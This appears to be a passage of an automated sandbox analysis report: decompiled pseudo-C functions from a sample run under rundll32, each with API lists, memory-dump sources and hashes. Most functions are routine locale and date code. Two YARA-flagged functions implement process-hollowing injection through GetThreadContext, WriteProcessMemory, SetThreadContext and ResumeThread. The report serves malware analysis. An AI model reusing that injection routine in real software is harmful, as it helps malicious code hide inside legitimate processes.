                                            				VirtualQuery(__edx,  &_v820, 0x1c);
                                            				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                            					_t40 =  *0x194660; // 0x180000
                                            					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                            					_v12 = E00189AAC(_t74);
                                            				} else {
                                            					_v12 = _t74 - _v820.AllocationBase;
                                            				}
                                            				E00186F28( &_v273, 0x104, E0018A938(0x5c) + 1);
                                            				_t75 = 0x189c38;
                                            				_t89 = 0x189c38;
                                            				_t85 =  *0x185b74; // 0x185bc0
                                            				if(E00182FD0(_t92, _t85) != 0) {
                                            					_t75 = E00183E0C( *((intOrPtr*)(_t92 + 4)));
                                            					_t69 = E00186F00(_t75, 0x189c38);
                                            					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                            						_t89 = 0x189c3c;
                                            					}
                                            				}
                                            				_t51 =  *0x193578; // 0x185924
                                            				_t16 = _t51 + 4; // 0xffe7
                                            				_t53 =  *0x194660; // 0x180000
                                            				LoadStringA(E00184840(_t53),  *_t16,  &_v790, 0x100);
                                            				E00182DBC( *_t92,  &_v1116);
                                            				_v860 =  &_v1116;
                                            				_v856 = 4;
                                            				_v852 =  &_v273;
                                            				_v848 = 6;
                                            				_v844 = _v12;
                                            				_v840 = 5;
                                            				_v836 = _t75;
                                            				_v832 = 6;
                                            				_v828 = _t89;
                                            				_v824 = 6;
                                            				E00187448(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                            				return E00186F00(_v8, _t89);
                                            			}
































                                            APIs
                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00189AD5
                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00189AF9
                                            • GetModuleFileNameA.KERNEL32(00180000,?,00000105), ref: 00189B14
                                            • LoadStringA.USER32 ref: 00189BAA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                            • String ID:
                                            • API String ID: 3990497365-0
                                            • Opcode ID: 8bff5876f5bc5081468ed5febce5bef49cbdb46c9a0a09c63f2074cf498a3004
                                            • Instruction ID: 2ed62fe29d50a7197910df4a36391a58bf4faa0d2cb043b8fe81e1c0318af937
                                            • Opcode Fuzzy Hash: 8bff5876f5bc5081468ed5febce5bef49cbdb46c9a0a09c63f2074cf498a3004
                                            • Instruction Fuzzy Hash: 86415E70A002589FDB21EB68DC85BDAB7FDAB19310F4440E5F508EB252D7749F848F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0018AA8C() {
                                            				char _v152;
                                            				short _v410;
                                            				signed short _t14;
                                            				signed int _t16;
                                            				int _t18;
                                            				void* _t20;
                                            				void* _t23;
                                            				int _t24;
                                            				int _t26;
                                            				signed int _t30;
                                            				signed int _t31;
                                            				signed int _t32;
                                            				signed int _t37;
                                            				int* _t39;
                                            				short* _t41;
                                            				void* _t49;
                                            
                                            				 *0x19473c = 0x409;
                                            				 *0x194740 = 9;
                                            				 *0x194744 = 1;
                                            				_t14 = GetThreadLocale();
                                            				if(_t14 != 0) {
                                            					 *0x19473c = _t14;
                                            				}
                                            				if(_t14 != 0) {
                                            					 *0x194740 = _t14 & 0x3ff;
                                            					 *0x194744 = (_t14 & 0x0000ffff) >> 0xa;
                                            				}
                                            				memcpy(0x193114, 0x18abe0, 8 << 2);
                                            				if( *0x1930cc != 2) {
                                            					_t16 = GetSystemMetrics(0x4a);
                                            					__eflags = _t16;
                                            					 *0x194749 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                            					_t18 = GetSystemMetrics(0x2a);
                                            					__eflags = _t18;
                                            					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                            					 *0x194748 = _t31;
                                            					__eflags = _t31;
                                            					if(__eflags != 0) {
                                            						return E0018AA14(__eflags, _t49);
                                            					}
                                            				} else {
                                            					_t20 = E0018AA74();
                                            					if(_t20 != 0) {
                                            						 *0x194749 = 0;
                                            						 *0x194748 = 0;
                                            						return _t20;
                                            					}
                                            					E0018AA14(__eflags, _t49);
                                            					_t37 = 0x20;
                                            					_t23 = E001829AC(0x193114, 0x20, 0x18abe0);
                                            					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                            					 *0x194748 = _t32;
                                            					__eflags = _t32;
                                            					if(_t32 != 0) {
                                            						 *0x194749 = 0;
                                            						return _t23;
                                            					}
                                            					_t24 = 0x80;
                                            					_t39 =  &_v152;
                                            					do {
                                            						 *_t39 = _t24;
                                            						_t24 = _t24 + 1;
                                            						_t39 =  &(_t39[0]);
                                            						__eflags = _t24 - 0x100;
                                            					} while (_t24 != 0x100);
                                            					_t26 =  *0x19473c; // 0x409
                                            					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                            					_t18 = 0x80;
                                            					_t41 =  &_v410;
                                            					while(1) {
                                            						__eflags =  *_t41 - 2;
                                            						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                            						 *0x194749 = _t37;
                                            						__eflags = _t37;
                                            						if(_t37 != 0) {
                                            							goto L17;
                                            						}
                                            						_t41 = _t41 + 2;
                                            						_t18 = _t18 - 1;
                                            						__eflags = _t18;
                                            						if(_t18 != 0) {
                                            							continue;
                                            						} else {
                                            							return _t18;
                                            						}
                                            						L18:
                                            					}
                                            				}
                                            				L17:
                                            				return _t18;
                                            				goto L18;
                                            			}




















                                            APIs
                                            • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0018AB80
                                            • GetThreadLocale.KERNEL32 ref: 0018AAB6
                                              • Part of subcall function 0018AA14: GetCPInfo.KERNEL32(00000000,?), ref: 0018AA2D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocaleStringThreadType
                                            • String ID:
                                            • API String ID: 1505017576-0
                                            • Opcode ID: c5c6054937e5a696a22b7c0c55a3b59f1f5bcc43b3ade66917712a41e37035b0
                                            • Instruction ID: 6d1bd621853908e268b1119286bd032320f87afd3e2649d34435cd458a577900
                                            • Opcode Fuzzy Hash: c5c6054937e5a696a22b7c0c55a3b59f1f5bcc43b3ade66917712a41e37035b0
                                            • Instruction Fuzzy Hash: A03108616402888BF724F7A5AC02BB23797EF12744F884057E5848BA91E7384AC6CF63
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001C2B80(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                            				void* _v8;
                                            				long _v12;
                                            				void* _v16;
                                            				char _v20;
                                            				char _v24;
                                            
                                            				_v12 = 0xffffffff;
                                            				if(E001C2B40(__ecx, _a4) != 0) {
                                            					if(E001C2C40( &_v8,  &_v16) != 0) {
                                            						if(E001C3270(_v8, _a4, _a8,  &_v24,  &_v20) == 1 && E001C37E0(_v8, _v16, _v24, _v20) == 1) {
                                            							_v12 = GetProcessId(_v8);
                                            						}
                                            						if(_v12 == 0xffffffff) {
                                            							TerminateProcess(_v8, 0);
                                            						}
                                            						CloseHandle(_v16);
                                            						CloseHandle(_v8);
                                            						return _v12;
                                            					}
                                            					return _v12;
                                            				}
                                            				return 0;
                                            			}









                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a8df6019d96ffa54b4df7d0b57305eac2b8b9eb83b60452f652309e3ce0efd8
                                            • Instruction ID: 71f8f7bd540fc42113cd00b3b66cad470db91e7e20a35973783069a506e46d54
                                            • Opcode Fuzzy Hash: 0a8df6019d96ffa54b4df7d0b57305eac2b8b9eb83b60452f652309e3ce0efd8
                                            • Instruction Fuzzy Hash: F521EFBAD00208BBCF14DBE8D995EEEB778AB68311F108658F915D3241E731DB40DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001C37E0(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
                                            				struct _CONTEXT _v720;
                                            
                                            				_v720.ContextFlags = 0x10002;
                                            				E001C14A0( &(_v720.Dr0), 0, 0x2c8);
                                            				if(GetThreadContext(_a8,  &_v720) != 0) {
                                            					if(WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0) != 0) {
                                            						_v720.Eax = _a16;
                                            						if(SetThreadContext(_a8,  &_v720) != 0) {
                                            							ResumeThread(_a8);
                                            							return 1;
                                            						}
                                            						return 0;
                                            					}
                                            					return 0;
                                            				}
                                            				return 0;
                                            			}





                                            APIs
                                            • GetThreadContext.KERNEL32(001C1ECF,00010002), ref: 001C3814
                                            • WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 001C3838
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ContextMemoryProcessThreadWrite
                                            • String ID:
                                            • API String ID: 2099319263-0
                                            • Opcode ID: fbe81fe8651e212880b5fc5c2ad2ca189d9d1435532eaf5514bc202cd675e66b
                                            • Instruction ID: 35b60a2458d739c4bf9a4813930894830aa7400860adc313570d40bca1a568d8
                                            • Opcode Fuzzy Hash: fbe81fe8651e212880b5fc5c2ad2ca189d9d1435532eaf5514bc202cd675e66b
                                            • Instruction Fuzzy Hash: C5116D75A45209ABEB14CF64EC49FEE37B8AB28744F10C65CFA19D6180E730DA50CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E0018831C(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                            				char _v8;
                                            				short _v18;
                                            				short _v22;
                                            				struct _SYSTEMTIME _v24;
                                            				char _v280;
                                            				char* _t32;
                                            				intOrPtr* _t49;
                                            				intOrPtr _t58;
                                            				void* _t63;
                                            				void* _t67;
                                            
                                            				_v8 = 0;
                                            				_t49 = __edx;
                                            				_t63 = __eax;
                                            				_push(_t67);
                                            				_push(0x1883fa);
                                            				_push( *[fs:eax]);
                                            				 *[fs:eax] = _t67 + 0xfffffeec;
                                            				E00183980(__edx);
                                            				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                                            				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                                            				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                                            				if(_t63 > 2) {
                                            					E00183A18( &_v8, 0x18841c);
                                            				} else {
                                            					E00183A18( &_v8, 0x188410);
                                            				}
                                            				_t32 = E00183E0C(_v8);
                                            				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                            					E00183BF0(_t49, 0x100,  &_v280);
                                            					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                            						E00183E64( *_t49, E00183C1C( *_t49) - 1, 2, _t49);
                                            					}
                                            				}
                                            				_pop(_t58);
                                            				 *[fs:eax] = _t58;
                                            				_push(E00188401);
                                            				return E00183980( &_v8);
                                            			}














                                            APIs
                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,001883FA), ref: 001883A2
                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 001883A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: DateFormatLocaleThread
                                            • String ID: yyyy
                                            • API String ID: 3303714858-3145165042
                                            • Opcode ID: b9003719d4761994f81047185cde2beaa648473ec652b71cfdf81f4a465efc4b
                                            • Instruction ID: e206810f7a37734cc20398f9885eb4fe810c038710a3d14fd13a6f3a61a74a25
                                            • Opcode Fuzzy Hash: b9003719d4761994f81047185cde2beaa648473ec652b71cfdf81f4a465efc4b
                                            • Instruction Fuzzy Hash: 62217139600608ABDB00FB68C982AAEB3A8FF18B00F9440A5F815E7751DB70DF00CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%